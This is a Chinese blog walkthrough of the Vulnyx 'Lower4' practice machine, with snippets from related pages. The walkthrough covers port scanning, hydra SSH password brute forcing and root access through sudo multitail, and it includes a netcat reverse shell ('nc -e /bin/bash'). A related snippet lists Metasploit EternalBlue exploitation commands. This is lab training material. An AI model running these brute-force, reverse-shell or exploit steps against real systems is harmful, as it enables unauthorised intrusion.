Vulnyx Lower4靶机复现

最新推荐文章于 2025-07-03 20:00:36 发布
原创 最新推荐文章于 2025-07-03 20:00:36 发布 · 431 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透

靶机详情

Nmap

利用arp-scan -l来扫描靶机IP,扫到192.168.38.238为靶机IP

接着用nmap来扫一下这个IP开放的端口有哪些

发现额外开放了一个113的端口,服务是ident,并且扫除了用户名为lucifer

hydra

接着用hydra进行爆破lucifer的密码

hydra -l lucifer -P rockyou.txt ssh://192.168.38.238 -V -I -e nsr

User

爆破到密码为789456123,接着ssh链接上去看看

ssh lucifer@192.168.38.238

Root

接着看一下sudo权限,

能通过sudo来执行/usr/bin/multitail,用sudo来执行一下这个文件

sudo /usr/bin/multitail

进入到了一个命令行界面,它提示我们要按F1来执行,按完F1后出现了一个使用手册,发现可以按一下a,可以添加内容,可以是一个文件或者是命令,既然可以上传一个命令,那就先用本机nc一下,再通过命令传入

靶机
nc -e /bin/bash 192.168.38.76 1234
本机
nc -lp 1234

靶机出现红框内容可以随意按一个键,然后直接传入空就行了

本机也出现了回显内容

Tidy_Nan
关注
Tomato靶机复现过程
weixin_67729650的博客
08-04 2347
这里我们看到了有一个用户Tomato的uid为1000(我们linux主机创建的第一个用户的uid为1000),且它的shell为/bin/bash(说明可以分配终端),再结合我们前面扫到的2211远程连接端口,说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址,就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了,那不就拿下了?紧接着我们可以试试我们学过的文件包含的漏洞知识,去试试。
反序列化靶机serial复现
muyuchen110的博客
08-01 864
【代码】反序列化靶机serial复现
渗透靶机 Doctor 复盘
Bulestardemon的博客
07-03 379
前端找到敏感路由,敏感词 php include 本地包含 passwd 和 id_rsa 进行用户登录 上传 linpeas 扫描,且利用 /etc/passwd 可写进行提权
vulnyx靶场(Low)
金灰的博客
03-04 2368
免责声明:本文仅做分享.low级别,难度偏低,适宜新手。
VulNyx-Lower4靶机
weixin_52710247的博客
05-01 585
新手友好的Lower4靶机,简单超级好过。
BlackMarket靶机复现
weixin_52956666的博客
08-07 1460
因为squirrelmail是web邮箱应用,存在 CVE-2017-7692 远程代码执行漏洞,但是得有一个用户可以登陆进去。因为 内核版本是4.4.0-31-generic,可以进行脏牛 CVE-2016-5195 提权。并且发现一句话Jason Bourne Email access?抓包,去查看,发现存在id值,这里先尝试改为1,因为大部分高权限用户都是1。尝试squirrelmail,squirrelmail。进入后发现没东西,一点发现有个隐藏的输入框。
VulNyx-Lower2靶机
weixin_52710247的博客
02-16 514
一台low级别的靶机,新手友好。
脏牛提权(靶机复现
lza20001103的博客
04-20 1320
脏牛提权(靶机复现
超详细jangow-01-1.0.1靶机复现过程
weixin_67729650的博客
08-05 2920
靶机导入到最后的提权这一过程,重在思路的建立.
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
decoy靶机复现
weixin_52956666的博客
08-19 862
使用root用户,运行0.49版本的chkrootkit程序,也就是通过使用命令/usr/bin/touch /dev/shm/STTY5246,或者使用程序honeypot.decoy的功能5 Launch an AV Scan.,或者甚至什么也不做,来调用root用户运行0.49版本的chkrootkit程序。pspy是Linux系统的进程监控工具,可以记录进程的运行情况,包括启动进程的命令,一定程度上类似于详细版的history命令。当用户为root用户,运行0.49版本的chkrootkit程序。
JAVA毕业设计含文档和代码springboot凉州区助农惠农服务平台
11-30
JAVA毕业设计含文档和代码springboot凉州区助农惠农服务平台
【四轴飞行器的位移控制】控制四轴飞行器的姿态和位置设计内环和外环PID控制回路(Simulink仿真实现)
11-30
【四轴飞行器的位移控制】控制四轴飞行器的姿态和位置设计内环和外环PID控制回路(Simulink仿真实现)内容概要:本文围绕四轴飞行器的位移控制展开,重点介绍如何通过设计内环和外环PID控制回路来实现对其姿态和位置的精确控制。外环负责根据期望位移生成姿态指令,内环则依据这些指令调节飞行器的实际姿态,从而实现稳定的位置跟踪。整个控制系统在Simulink环境中进行建模与仿真,便于验证控制策略的有效性与鲁棒性。文中详细阐述了四轴飞行器的动力学模型、控制结构设计原理以及PID参数整定方法,帮助读者深入理解飞行器控制的核心机制。; 适合人群:具备自动控制理论基础和Simulink仿真经验的高校学生、科研人员及从事无人机控制开发的工程师。; 使用场景及目标:①用于教学实践中帮助学生掌握多变量控制系统的设计方法;②为无人机姿态与位置控制系统的开发提供可复现的仿真框架;③支持进一步研究高级控制算法(如串级控制、自适应控制)在飞行器中的应用。; 阅读建议:建议读者结合Simulink模型同步操作,动手调试PID参数以观察系统响应变化,加深对内外环协同控制机制的理解,并可在此基础上拓展为非线性或智能控制策略的研究。
【嵌入式开发】Rust与C++互操作技术指南:基于FFI与bindgen的混合编程及渐进式迁移方案设计
11-30
内容概要:本文是一份关于在嵌入式环境中实现Rust与C++互操作的工程实践指南,系统介绍了如何将Rust逐步集成到现有的C/C++驱动框架中。内容涵盖互操作机制(如FFI、extern "C"、bindgen工具)、构建系统集成(Cargo与Make/CMake等)、内存与所有权管理、中断处理、调试测试流程及性能优化,并提供完整的实战案例——用Rust实现I2C传感器驱动并集成到C项目中。文章强调安全性、兼容性和渐进式迁移策略,附有大量可运行代码和常见问题解决方案。; 适合人群:具备一定嵌入式开发经验,熟悉C/C++,并希望引入Rust提升代码安全性的中高级工程师或技术团队;适合正在考虑语言迁移或模块重构的开发者; 使用场景及目标:①在现有C/C++项目中安全嵌入Rust模块,降低内存安全隐患;②实现高效跨语言调用,优化关键组件的可靠性与维护性;③通过bindgen自动化绑定、联合构建与调试,完成实际驱动开发与性能验证; 阅读建议:建议结合示例代码动手实践,重点关注FFI边界设计、内存安全规则和构建脚本配置,在真实嵌入式平台上进行调试与测试以掌握全流程。
zhongyanghan_Risk-prediction-of-credit-card-transaction-fraud-based-on-L
11-30
zhongyanghan_Risk-prediction-of-credit-card-transaction-fraud-based-on-L
Garfield-0927_JavaExperiment_34704_1763630740306.zip
11-30
Garfield-0927_JavaExperiment_34704_1763630740306
HEVC基本原理,变换、量化、熵编码、帧内预测、帧间预测以及环路滤波等模块 在HEVC中,几乎每个模块都引入了新的编码技术
最新发布
11-30
编码原理解析清楚,HEVC基本原理,变换、量化、熵编码、帧内预测、帧间预测以及环路滤波等模块。在HEVC中,几乎每个模块都引入了新的编码技术
基于MATLAB和Simulink开发的水箱液位控制系统仿真挑战项目_项目极简说明为使用MATLAB代码编写仿真环境挑战者需设计控制策略通过调节进水阀门开度来精确调节水箱液位高度.zip
11-30
基于MATLAB和Simulink开发的水箱液位控制系统仿真挑战项目_项目极简说明为使用MATLAB代码编写仿真环境挑战者需设计控制策略通过调节进水阀门开度来精确调节水箱液位高度.zip
msf复现永恒之蓝靶机搭建
07-12
### 环境搭建与配置 为了成功复现 EternalBlue 漏洞,首先需要准备好实验环境。靶机选择 **Windows 7** 系统,IP 地址为 `192.168.244.133`;攻击机使用 **Kali Linux**,IP 地址为 `192.168.244.136`。所需工具包括 `nmap` 和 `metasploit-framework (MSF)`,这些工具默认集成在 Kali 系统中[^1]。 #### 靶机准备 - 安装 Windows 7 系统,并确保未安装补丁 KB4012598(该补丁修复了 MS17-010 漏洞)。 - 关闭防火墙或允许 SMB 协议通过。 - 确保系统开启了文件共享功能,SMB 服务运行正常。 #### 攻击机准备 - 安装 Kali Linux 并更新系统。 - 安装 Metasploit Framework,可通过命令 `sudo apt install metasploit-framework` 进行安装。 - 确认 nmap 已安装,用于网络扫描和端口探测。 ### 使用 Metasploit 复现 EternalBlue 漏洞 #### 启动 Metasploit Framework 打开终端并输入以下命令启动 Metasploit: ```bash msfconsole ``` 进入 Metasploit 控制台后,输出信息显示当前版本及模块数量,如下所示: ``` =[ metasploit v6.3.27-dev ] + -- --=[ 2335 exploits - 1220 auxiliary - 413 post ] + -- --=[ 1385 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] ``` #### 搜索 EternalBlue 模块 在 Metasploit 控制台中执行以下命令搜索相关模块: ```bash search eternalblue ``` 系统将列出多个与 EternalBlue 相关的模块,例如 `exploit/windows/smb/ms17_010_eternalblue`。选择该模块进行漏洞利用: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` #### 设置目标与负载 查看模块所需的参数: ```bash show options ``` 主要需要设置以下参数: - `RHOSTS`: 靶机 IP 地址,即 `192.168.244.133` - `LHOST`: 攻击机 IP 地址,即 `192.168.244.136` 设置参数命令如下: ```bash set RHOSTS 192.168.244.133 set LHOST 192.168.244.136 ``` 默认情况下,模块会使用合适的 payload,如 `windows/x64/meterpreter/reverse_tcp`。若需更改 payload,可使用 `set payload` 命令指定。 #### 执行漏洞利用 完成所有设置后,执行漏洞利用: ```bash exploit ``` 如果一切顺利,Metasploit 将尝试连接靶机并通过 SMB 协议发送恶意数据包,最终获得 Meterpreter 会话。 #### 成功获取 Meterpreter 会话 一旦漏洞利用成功,控制台将显示 Meterpreter 提示符,表示已成功获取目标系统的控制权。此时可以执行多种操作,如上传文件、执行命令等。 ```bash meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` 上述结果显示当前权限为 `NT AUTHORITY\SYSTEM`,即最高权限,说明漏洞利用成功。 ### 注意事项与防御建议 - **测试环境隔离**:确保实验环境与生产网络隔离,避免误伤真实系统。 - **漏洞修复**:微软已于 2017 年发布补丁 KB4012598 修复此漏洞。对于实际环境中未打补丁的系统,应尽快安装官方补丁。 - **SMB 协议防护**:企业网络中应限制 SMB 协议的外部访问,关闭不必要的共享服务,启用防火墙规则阻止非法 SMB 请求。 - **入侵检测**:部署 IDS/IPS 系统,监控异常 SMB 流量,及时发现类似 EternalBlue 的攻击行为。 ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值